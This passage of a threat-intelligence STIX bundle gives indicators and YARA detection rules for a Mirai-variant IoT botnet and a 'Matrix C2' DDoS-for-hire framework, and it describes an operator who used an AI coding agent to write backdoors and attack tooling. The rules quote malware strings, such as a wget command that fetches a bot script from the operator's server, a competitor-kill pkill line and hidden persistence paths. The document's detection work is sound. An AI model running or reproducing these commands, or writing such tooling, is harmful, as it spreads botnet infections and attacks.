"file--bbc48912-7570-5911-b389-1bebcb1eff7c", "hashes": { "SHA-256": "79b01dd6e9e808b8e14c9a7dd2751264dd4d5fd96508de383c0fdbfd81a814dc" } }, { "type": "file", "spec_version": "2.1", "id": "file--3d9c4059-7528-5bff-97f2-0ba5446040c8", "hashes": { "SHA-256": "e091a8cb3286e61f87a0d515705d79f8eebdbc64accc9e147ca48f35aa85ce2c" } }, { "type": "file", "spec_version": "2.1", "id": "file--be2bdaea-623c-519b-981d-a4ba4ef3838e", "hashes": { "SHA-256": "81748f0236319c678db39945ec77fffe1b33e84ffa9731b2836b911f8e83a5cc" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--eae8b01b-12e2-53d0-8086-463ccacf210d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.894678Z", "modified": "2026-06-16T16:01:05.894678Z", "name": "sha256: 81748f0236319c678db39945ec77fffe1b33e84ffa9731b2836b911f8e83a5cc", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '81748f0236319c678db39945ec77fffe1b33e84ffa9731b2836b911f8e83a5cc']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--b6f2794d-55f6-5a80-bbce-e4b2fa972e8c", "hashes": { "SHA-256": "d888a16cd6aa76f62a329906db4f241e6bc23ff5f21d61e754ade8ccab6da0d0" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--6dd72edc-d426-59e0-bfa6-786fd09c7066", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.895365Z", "modified": "2026-06-16T16:01:05.895365Z", "name": "sha256: d888a16cd6aa76f62a329906db4f241e6bc23ff5f21d61e754ade8ccab6da0d0", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = 'd888a16cd6aa76f62a329906db4f241e6bc23ff5f21d61e754ade8ccab6da0d0']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "file", "spec_version": "2.1", "id": "file--71982346-9bae-5883-ba88-6d27c3ba51e8", "hashes": { "SHA-256": "9eece9f46bc420b53884d4292622621c9960459c1d7a73635420771e7d0aa1fa" } }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--3caf9842-74d2-54be-830e-279641463f85", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.896184Z", "modified": "2026-06-16T16:01:05.896184Z", "name": "sha256: 9eece9f46bc420b53884d4292622621c9960459c1d7a73635420771e7d0aa1fa", "indicator_types": [ "malicious-activity" ], "pattern": "[file:hashes.'SHA-256' = '9eece9f46bc420b53884d4292622621c9960459c1d7a73635420771e7d0aa1fa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2026-05-26T00:00:00Z", "confidence": 95, "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ], "x_opencti_detection": false, "x_opencti_score": 95 }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--b5edd3d6-548e-50e6-b560-01578db3b113", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897053Z", "modified": "2026-06-16T16:01:05.897053Z", "name": "MAL_ELF_Naku_Pandora_Mirai_Family", "indicator_types": [ "malicious-activity" ], "pattern": "/*\n Yara Rule Set\n Identifier: Naku/Pandora-Mirai 11-arch IoT botnet (UTA-2026-014)\n Author: The Hunters Ledger\n Source: https://pixelatedcontinuum.github.io/Threat-Intel-Reports/\n License: CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\n*/\n\nrule MAL_ELF_Naku_Pandora_Mirai_Family {\n meta:\n description = \"Detects Naku/Pandora-Mirai 11-architecture IoT botnet based on operator-bespoke 22-char random-string charset, Sora-fork /bin/busybox SORA derivative marker (XOR-0x54 encoded), and canonical Mirai botnet symbols. Operator uses triple XOR keys (0x54/0x42/0x45); charset is present in all 11 release architectures and acts as cross-arch tracking signature.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"64afc3b3a02706ffcf4255bda4519f8c1c66daaaf937a2641fd14a551a34e383\"\n hash2 = \"595f4315f00c2fce839eabe9880f669990256d6638fb148996872e37ffc9b28a\"\n hash3 = \"afd49e3ceb20a8e861fa4804b6ea988f8aefd6942f84973f32b8e24c7df03410\"\n family = \"Pandora-Mirai\"\n malware_type = \"IoT Botnet\"\n campaign = \"UTA-2026-014\"\n id = \"2653771b-6124-5656-903c-cc65f43a21a5\"\n strings:\n // Operator-bespoke 22-char random-string charset (XOR-0x54 encoded blob)\n // Decoded value: 1gba4cdom53nhp12ei0kfj\n // Raw XOR-0x54 encoded form in binary\n $charset_xor = { 65 33 36 35 60 37 30 3B 39 61 67 3A 3C 24 65 66 31 3D 64 3F 32 3E }\n // Sora-fork derivative: /bin/busybox SORA XOR-0x54 encoded\n // Distinguishes from stock Mirai /bin/busybox MIRAI\n $sora_xor = { 7B 36 3D 3A 36 21 27 36 3B 2C 74 24 27 20 61 }\n // PandoraNet operator botnet ID (plaintext in arm7 debug build and process args)\n $pandoranet = \"PandoraNet\" ascii fullword\n // Mirai canonical function symbols (arm7 debug build; these are DEFINITE Mirai-lineage markers)\n $sym_auth = \"add_auth_entry\" ascii fullword\n $sym_resolve = \"resolve_cnc_addr\" ascii fullword\n // .anime operator-bespoke marker (XOR-0x54 decoded)\n $anime_xor = { 7F 61 59 97 } // partial XOR-0x54 encoding of \".anime\"\n condition:\n uint32(0) == 0x464C457F and\n filesize < 200KB and\n (\n ($charset_xor and $sora_xor) or\n ($charset_xor and $pandoranet) or\n ($sym_auth and $sym_resolve and $charset_xor) or\n ($pandoranet and $sym_auth and $sym_resolve)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--1db870aa-d146-5e1a-ac3e-0e2278763572", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.89721Z", "modified": "2026-06-16T16:01:05.89721Z", "name": "MAL_Bash_Pandora_Dropper_Family", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Bash_Pandora_Dropper_Family {\n meta:\n description = \"Detects pandora.sh / Naku.sh dropper class fetching 11-architecture Pandora-Mirai ELF binaries via wget/curl loop. Operator-specific arch-set (arm/arm5/arm6/arm7/m68k/mips/mpsl/ppc/sh4/spc/x86), execution-with-arch-tag pattern, and cleanup sequence identify this dropper family across both standard (port 80) and HTTPS-channel (port 443) variants.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"d3fd9994b16dc9b14c29f7faf7b5f6c84f44b06fccf82f0031a0871ce5e20e17\"\n family = \"Pandora-Mirai\"\n malware_type = \"Dropper\"\n campaign = \"UTA-2026-014\"\n id = \"46df6422-622f-58e0-92fc-fd4110df274e\"\n strings:\n // Architecture set \u2014 operator-specific subset with all 11 arches\n $arch_arm5 = \"arm5\" ascii\n $arch_arm6 = \"arm6\" ascii\n $arch_m68k = \"m68k\" ascii\n $arch_mpsl = \"mpsl\" ascii\n $arch_sh4 = \"sh4\" ascii\n $arch_spc = \"spc\" ascii\n // Operator distribution host patterns\n $distrib_primary = \"87.106.143.220\" ascii\n $distrib_aruba = \"80.211.94.16\" ascii\n // Binary naming conventions\n $bin_naku = \"Naku.\" ascii\n $bin_pandora = \"Pandora.\" ascii\n // Execution-with-arch-tag pattern (argv-source-tagging)\n $exec_tag_r = \"./nig realtek\" ascii\n $exec_tag_n = \"pandora_bot PandoraNet\" ascii\n // Cleanup pattern\n $cleanup = \"rm -rf nig\" ascii\n condition:\n filesize < 50KB and\n (\n (3 of ($arch_*) and ($bin_naku or $bin_pandora) and ($distrib_primary or $distrib_aruba)) or\n ($exec_tag_r and $cleanup and $distrib_aruba) or\n ($exec_tag_n and ($distrib_primary or $distrib_aruba))\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--cc3f380d-3be9-5c85-a6a2-0e61e9947461", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897342Z", "modified": "2026-06-16T16:01:05.897342Z", "name": "MAL_Python_Matrix_C2_Framework_Family", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Python_Matrix_C2_Framework_Family {\n meta:\n description = \"Detects Matrix C2 Python DDoS-as-a-Service framework files authored via Atlassian Rovodev AI coding agent. Identifies master_control.py, attack_engine.py, and multi_vector_agent.py via AI-generated banner strings, operator-marketing comments, emoji-branded attack method catalog entries, and mass-infection docstring captured directly from Rovodev session file_write tool call payloads.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"e9e0eafc89e4a9db796c63bb4fdc5c0fd1106f8b9c234fb57e51a7934f2b8d8e\"\n hash2 = \"921e4c1d86813838d40010e82a8f374a70b91f06008db5182d1ec6c2da672c09\"\n hash3 = \"a19b972688158e361e8646ec17556ec46bf84f0cd24fb8707e4df85cb9d9a6d2\"\n family = \"Matrix C2\"\n malware_type = \"DDoS-as-a-Service Framework\"\n campaign = \"UTA-2026-014\"\n id = \"d804ea26-cbfc-5194-854c-228ee9cfc434\"\n strings:\n // AI-generated ASCII-banner header (IMPLEMENTATION_PLAN.txt)\n $banner = \"MATRIX C2 - IMPLEMENTATION PLAN\" ascii\n // AI-generated docstring captured in session_context.json file_write payload\n $docstring = \"Launch mass infection campaign\" ascii\n // AI-Generated Code Signature #9 \u2014 emoji-in-output bleed in attack catalog\n $emoji_icmp = \"\\xf0\\x9f\\x94\\xa5 ICMP Hell\" ascii\n $emoji_udp = \"\\xf0\\x9f\\x9a\\x80 UDP Bypass\" ascii\n // Operator-marketing comment inline in attack_engine.py source\n $gbps_claim = \"Increased default threads for 50Gbps+\" ascii\n // AI-Generated Documentation Signature \u2014 compounding-superlative naming\n $final_doc = \"FINAL_DEPLOYMENT_COMPLETE\" ascii\n $ultimate = \"ULTIMATE_DEPLOYMENT\" ascii\n // LLM closure phrase captured in IMPLEMENTATION_PLAN.txt\n $llm_close = \"Let me start Phase 1 now\" ascii\n // Method dispatch table entries (attack_engine.py)\n $method_udp = \"'udp-star'\" ascii\n $method_syn = \"'syn-storm'\" ascii\n $method_ovh = \"'ovh-nuke'\" ascii\n condition:\n filesize < 2MB and\n (\n ($banner and ($docstring or $llm_close)) or\n ($gbps_claim and ($emoji_icmp or $emoji_udp)) or\n ($final_doc and $ultimate) or\n (2 of ($method_udp, $method_syn, $method_ovh) and ($gbps_claim or $docstring))\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--11971737-7145-51a3-aa91-758c1786accc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897461Z", "modified": "2026-06-16T16:01:05.897461Z", "name": "MAL_Python_AIGenerated_OffensiveCode_Universal_Subset", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Python_AIGenerated_OffensiveCode_Universal_Subset {\n meta:\n description = \"Cross-operator detection for AI-generated offensive Python code using the 5-criteria universal subset confirmed across 3 independent operators (Russian Gemini, Turkish ARPA, English Rovodev). Detects co-occurrence of verbose docstrings, bare-except handlers, educational variable naming, emoji-in-output bleed, and version-numbered iteration chains that are structurally diagnostic of AI-authored offensive tooling. High FP risk in isolation; requires multi-criteria co-occurrence gate.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"64ca12cae6f5e520abb4158da3bbc14e909c2128748ae0c5806fa4206cc14260\"\n family = \"AI-Generated Offensive Code\"\n malware_type = \"Offensive Python (AI-authored)\"\n campaign = \"ai-agent-frameworks-2026-05-23\"\n id = \"38aeca8a-3dad-5b61-9787-a14edf92a250\"\n strings:\n // Criterion #7 \u2014 bare-except + verbose-docstring co-occurrence\n // (bare except in Python: \"except:\" or \"except Exception:\" + \"pass\")\n $bare_except1 = \"except:\" ascii\n $bare_except2 = \"except Exception:\" ascii\n $bare_pass = /except[^\\n]*:\\s*\\n\\s*pass/ ascii\n // Criterion #1 / #3 \u2014 verbose docstrings with educational/operational naming\n $doc_attack = /def \\w+_attack\\w*\\(.*\\):\\s*\\n\\s+\\\"\\\"\\\"/ ascii\n $doc_flood = /def \\w+_flood\\w*\\(.*\\):\\s*\\n\\s+\\\"\\\"\\\"/ ascii\n $doc_scan = /def \\w+_scan\\w*\\(.*\\):\\s*\\n\\s+\\\"\\\"\\\"/ ascii\n $doc_infect = /def \\w+_infect\\w*\\(.*\\):\\s*\\n\\s+\\\"\\\"\\\"/ ascii\n // Criterion #9 \u2014 emoji-in-output bleed in offensive context\n $emoji_fire = \"\\xf0\\x9f\\x94\\xa5\" ascii // \ud83d\udd25\n $emoji_rocket = \"\\xf0\\x9f\\x9a\\x80\" ascii // \ud83d\ude80\n $emoji_check = \"\\xe2\\x9c\\x85\" ascii // \u2705\n // Criterion #10 \u2014 version-numbered file persistence chain\n $ver_chain_v2 = \"_v2.\" ascii\n $ver_chain_v3 = \"_v3.\" ascii\n $ver_chain_v4 = \"_v4.\" ascii\n // Offensive context markers (required to anchor rule to malicious code, not legitimate tooling)\n $ctx_ddos = \"ddos\" nocase ascii\n $ctx_flood = \"flood\" nocase ascii\n $ctx_brute = \"brute\" nocase ascii\n $ctx_infect = \"infect\" nocase ascii\n $ctx_cnc = \"cnc\" nocase ascii\n condition:\n filesize < 500KB and\n // Must be Python\n (uint16(0) == 0x2123 or $bare_except1 or $bare_except2) and\n // Must have offensive context\n (1 of ($ctx_*)) and\n // Must have multiple AI-signature criteria\n (\n ($bare_pass and 1 of ($doc_*)) or\n (1 of ($emoji_*) and 1 of ($doc_*)) or\n (2 of ($ver_chain_v2, $ver_chain_v3, $ver_chain_v4) and 1 of ($doc_*))\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--1de8572f-2eec-5f52-94e0-72c0699dcc66", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897577Z", "modified": "2026-06-16T16:01:05.897577Z", "name": "MAL_Discord_Bot_DDoSasService_Customer_Interface", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Discord_Bot_DDoSasService_Customer_Interface {\n meta:\n description = \"Detects Matrix C2 Discord-bot customer interface JavaScript dispatch table for DDoS-as-a-Service. Identifies the 13-attack-method catalog (udp-star, syn-storm, tcp-matrix, tcp-rst, udp-bypass, icmp-hell, multi-vector, http-flood, mass_infection, frag-storm, dns-rain, ovh-nuke, http-star) combined with VIP/free tier branding, GBPS capability estimates, and AI-Generated Code Signature emoji branding (\ud83d\udd25 \ud83d\ude80). Captured directly from Atlassian Rovodev session JSON rovodev.log.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"81748f0236319c678db39945ec77fffe1b33e84ffa9731b2836b911f8e83a5cc\"\n family = \"Matrix C2\"\n malware_type = \"DDoS-as-a-Service Bot Interface\"\n campaign = \"UTA-2026-014\"\n id = \"0f9967aa-bd3f-5fba-be62-bf75b119989b\"\n strings:\n // Attack method names from dispatch table\n $m_udpstar = \"'udp-star'\" ascii\n $m_synstorm = \"'syn-storm'\" ascii\n $m_tcpmat = \"'tcp-matrix'\" ascii\n $m_tcprst = \"'tcp-rst'\" ascii\n $m_bypass = \"'udp-bypass'\" ascii\n $m_icmp = \"'icmp-hell'\" ascii\n $m_multi = \"'multi-vector'\" ascii\n $m_http = \"'http-flood'\" ascii\n $m_infect = \"'mass_infection'\" ascii\n $m_frag = \"'frag-storm'\" ascii\n $m_dns = \"'dns-rain'\" ascii\n $m_ovh = \"'ovh-nuke'\" ascii\n $m_httpstar = \"'http-star'\" ascii\n // Tier model marker\n $tier_vip = \"vip: true\" ascii\n $tier_free = \"vip: false\" ascii\n // GBPS estimate field (operator-marketing data in dispatch table)\n $gbps_field = \"gbps:\" ascii\n // Emoji branding from attack catalog\n $emoji_icmp = \"\\xf0\\x9f\\x94\\xa5 ICMP Hell\" ascii\n $emoji_udp = \"\\xf0\\x9f\\x9a\\x80 UDP Bypass\" ascii\n condition:\n filesize < 500KB and\n (\n (4 of ($m_*) and ($tier_vip or $tier_free)) or\n (3 of ($m_*) and $gbps_field and ($emoji_icmp or $emoji_udp)) or\n ($m_ovh and $m_frag and $m_infect and $tier_vip)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0ca74fef-4a2d-5938-b239-55e83dcf00b9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897693Z", "modified": "2026-06-16T16:01:05.897693Z", "name": "MAL_Markdown_Rovodev_WhatINeed_OperatorPrompt", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Markdown_Rovodev_WhatINeed_OperatorPrompt {\n meta:\n description = \"Detects whatineed.txt-class operator natural-language prompts to AI coding agents specifying offensive capability development. Pattern includes C2 debugging request, GitHub C2-leak repository reference, automatic credential harvesting ('automatic give me login'), Discord integration request, and operator user-ID disclosure. This operator's exact file captured from 87.106.143.220 open-directory.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"d888a16cd6aa76f62a329906db4f241e6bc23ff5f21d61e754ade8ccab6da0d0\"\n family = \"Rovodev Operator Artifacts\"\n malware_type = \"Operator Prompt (AI-Augmented Offensive Operations)\"\n campaign = \"UTA-2026-014\"\n id = \"3e3d1343-158e-5030-b682-3a90eb4966ef\"\n strings:\n // Operator's exact C2-debug request phrase\n $c2_debug = \"c2 doesn't connect\" ascii nocase\n // GitHub C2-Leak reference pattern (operator references upstream code source)\n $c2_leak = \"C2-Leak\" ascii\n // Offensive-intent credential harvesting phrase\n $auto_login = \"automatic give me login\" ascii nocase\n // Discord integration request (operator's customer-facing channel)\n $discord_req = \"make discord live\" ascii nocase\n // Operator Discord user-ID disclosure\n $discord_id = \"1441591352927326259\" ascii\n // Anti-forensic cleanup request\n $cleanup_req = \"clean files not needed\" ascii nocase\n // Escalation request (\"modern methods\" / \"more stuff to make it stronger\")\n $stronger = \"make it stronger\" ascii nocase\n condition:\n filesize < 10KB and\n (\n ($c2_debug and $c2_leak) or\n ($auto_login and $discord_req) or\n ($discord_id and $cleanup_req) or\n ($c2_debug and $auto_login and $stronger)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0ca2f1e7-7096-5c1e-a459-8d519800b3f7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897807Z", "modified": "2026-06-16T16:01:05.897807Z", "name": "MAL_Python_StealthAgent_AntiDebug_AntiVM_AI_Authored", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Python_StealthAgent_AntiDebug_AntiVM_AI_Authored {\n meta:\n description = \"Detects stealth_agent.py-class AI-authored Python backdoor connecting to 87.106.143.220:1337. Authored via escalated Rovodev prompt producing anti-debug, anti-VM, sandbox evasion, process hiding, rootkit install, systemd/cron persistence, self-destruct, and polymorphic payload generation combined with bare-except AI-code signature. Refines AI-Generated Code Signature criterion #4 (zero anti-analysis is PROMPT-CONDITIONAL, not structural).\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"d1086ab3c06764ffd81492b4c723bda83bac19dc101c8542bc566e5888c92da3\"\n family = \"Matrix C2\"\n malware_type = \"Stealth Agent (AI-authored backdoor)\"\n campaign = \"UTA-2026-014\"\n id = \"d4482d80-a943-5693-86d2-773c22063b33\"\n strings:\n // C2 endpoint (operator-OWNED Matrix C2 \u2014 hardcoded in agent)\n $cnc_ip = \"87.106.143.220\" ascii\n $cnc_port = \"1337\" ascii\n // Anti-analysis feature keywords (per Hunt aiBrief)\n $anti_debug = \"anti_debug\" ascii nocase\n $anti_vm = \"anti_vm\" ascii nocase\n $sandbox_chk = \"sandbox\" ascii nocase\n // Rootkit + persistence features\n $rootkit = \"rootkit\" ascii nocase\n $self_dest = \"self_destruct\" ascii nocase\n $polymorphic = \"polymorphic\" ascii nocase\n // AES-256-GCM encryption markers (encrypted_agent.py siblings)\n $aes_gcm = \"AES-256-GCM\" ascii\n $pbkdf2 = \"PBKDF2\" ascii\n $handshake = \"handshake\" ascii nocase\n // AI-Generated Code Signature bare-except (structural AI-authorship marker)\n $bare_exc = \"except:\" ascii\n condition:\n filesize < 500KB and\n $cnc_ip and\n (\n (2 of ($anti_debug, $anti_vm, $sandbox_chk) and ($rootkit or $self_dest)) or\n ($aes_gcm and $pbkdf2 and $handshake) or\n ($polymorphic and $bare_exc and $cnc_port)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--ea46ebd6-e86b-5bc7-9816-26048fd4b8a2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.897921Z", "modified": "2026-06-16T16:01:05.897921Z", "name": "MAL_JSON_Rovodev_SessionContext_FileWrite_Authoring", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_JSON_Rovodev_SessionContext_FileWrite_Authoring {\n meta:\n description = \"Detects operator-exposed Atlassian Rovodev AI coding agent session artifacts (session_context.json / rovodev.log) containing file_write tool calls with offensive Python initial_content payloads. These session JSONs document end-to-end AI co-authoring of offensive frameworks. The 257b6faf session (1.24 MB) and 8b911ec6 session (176 KB) captured from operator's 87.106.143.220 open-directory are the primary artifact class.\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"9eece9f46bc420b53884d4292622621c9960459c1d7a73635420771e7d0aa1fa\"\n family = \"Rovodev Operator Artifacts\"\n malware_type = \"AI Coding Agent Session Artifact\"\n campaign = \"UTA-2026-014\"\n id = \"826c0fe7-b1fc-5689-9fd7-69e2abc40277\"\n strings:\n // Rovodev session JSON key patterns\n $session_key = \"session_context\" ascii\n $tool_call = \"file_write\" ascii\n $init_content = \"initial_content\" ascii\n // Rovodev log file pattern\n $rovo_log = \"rovodev.log\" ascii\n // Python shebang in file_write payloads (offensive Python content)\n $py_shebang = \"#!/usr/bin/env python3\" ascii\n // Session UUID patterns (operator's two sessions)\n $sess_257 = \"257b6faf-6426-47e9-8458-381befca3ef5\" ascii\n $sess_8b9 = \"8b911ec6-186f-423a-aa74-7b5d17e4d9ca\" ascii\n // AI-generated offensive content markers within session\n $mass_infect = \"Launch mass infection campaign\" ascii\n $c2_header = \"MATRIX C2\" ascii\n condition:\n filesize < 2MB and\n (\n ($session_key and $tool_call and $init_content and $py_shebang) or\n ($sess_257 or $sess_8b9) or\n ($tool_call and $mass_infect) or\n ($rovo_log and $c2_header)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--42a898b0-8b4d-5135-9be9-4d0d7add2ba5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898042Z", "modified": "2026-06-16T16:01:05.898042Z", "name": "MAL_Python_Persistent_Bot_DualChannel_CNC", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Python_Persistent_Bot_DualChannel_CNC {\n meta:\n description = \"Detects persistent_bot.sh-class operator scripts implementing 5-vector Linux persistence and dual-channel CNC architecture. Identifies operator-specific JSON wire format (bot_register + heartbeat messages with bot_type/arch/vendor fields) to Matrix C2 at 87.106.143.220:1337, hidden cron entry /etc/cron.d/.cache_update, and masquerade persistence (sysupdate init.d service + system-update.service systemd unit).\"\n license = \"CC BY-NC 4.0 - https://creativecommons.org/licenses/by-nc/4.0/\"\n author = \"The Hunters Ledger\"\n reference = \"https://the-hunters-ledger.com/hunting-detections/rovodev-mirai-matrix-c2-87.106.143.220-detections/\"\n date = \"2026-05-26\"\n hash1 = \"4809a7ee9f5dbcbe86cfbd77a45e2a268a37bcc947e8e1621164df653597948b\"\n family = \"Matrix C2\"\n malware_type = \"Persistence Installer (AI-authored)\"\n campaign = \"UTA-2026-014\"\n id = \"91f7bf1a-6620-50cf-81c0-ff7faf1328e3\"\n strings:\n // JSON wire format \u2014 bot_register message fields\n $wire_reg = \"\\\"type\\\":\\\"bot_register\\\"\" ascii\n $wire_arch = \"\\\"arch\\\":\\\"$arch\\\"\" ascii\n $wire_vendor = \"\\\"vendor\\\":\\\"$vendor\\\"\" ascii\n $wire_hb = \"\\\"type\\\":\\\"heartbeat\\\"\" ascii\n // C2 endpoint\n $cnc_ep = \"87.106.143.220\" ascii\n $cnc_port = \"1337\" ascii\n // Hidden cron entry (operator-specific filename)\n $cron_hidden = \"/etc/cron.d/.cache_update\" ascii\n // Masquerade persistence filenames\n $initd_mask = \"/etc/init.d/sysupdate\" ascii\n $systemd_mask = \"/etc/systemd/system/system-update.service\" ascii\n // Reseed channel (persistence downloads from operator VPS)\n $reseed = \"wget -qO- http://87.106.143.220/bot.sh\" ascii\n // Competitor kill list\n $kill_comp = \"pkill -9 -f \\\"(mirai|qbot|tsunami|gafgyt|bashlite|kaiten)\\\"\" ascii\n condition:\n filesize < 50KB and\n (\n ($wire_reg and $cnc_ep) or\n ($cron_hidden and ($initd_mask or $systemd_mask)) or\n ($reseed and $kill_comp) or\n ($wire_hb and $cnc_port and $cron_hidden)\n )\n}", "pattern_type": "yara", "valid_from": "2026-05-26T00:00:00Z", "labels": [ "detection-rule" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--316051bb-937d-5a1e-ab0d-0c575e5e14e6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.898157Z", "modified": "2026-06-16T16:01:05.898157Z", "name": "MAL_Discord_OperatorID_Snowflake_PandoraNet", "indicator_types": [ "malicious-activity" ], "pattern": "rule MAL_Discord_OperatorID_Snowflake_PandoraNet {\n meta:\n description = \"Narrow detection on the literal Discord operator snowflake ID 1441591352927326259 as it appears in operator artifacts (whatineed.txt prompt, Discord bot configs, operator notes). Snowflake decodes to account creation timestamp 2025-11-22T00:49:22 UTC \u2014 fresh ops persona ~182 days old at investigation. Also detects PandoraNet botnet ID co-occurrence in operator-exposed files. Use as a pivot/hunting rule 